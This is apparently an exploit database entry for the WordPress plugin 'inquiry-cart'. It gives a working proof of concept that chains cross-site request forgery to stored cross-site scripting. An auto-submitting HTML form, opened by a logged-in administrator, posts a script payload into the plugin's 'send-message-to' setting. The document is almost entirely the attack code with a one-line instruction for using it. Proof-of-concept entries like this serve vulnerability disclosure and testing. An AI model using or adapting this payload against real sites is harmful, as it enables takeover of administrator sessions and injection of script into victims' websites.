Share
## https://sploitus.com/exploit?id=WPEX-ID:F1E90A8A-D959-4316-A5D4-E183854944BD
Make a logged in admin open an HTML file containing:

```

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=inquiry-cart%2Finquiry-cart.php" method="post">
    <input name="send-message-to" type="text" value='"><script>alert(9995)</script>'>
    <input type="text" name="rd-ic-hidden" value="y">
    <input type="submit" name="submit" value="submit">
    </form>
</body>

```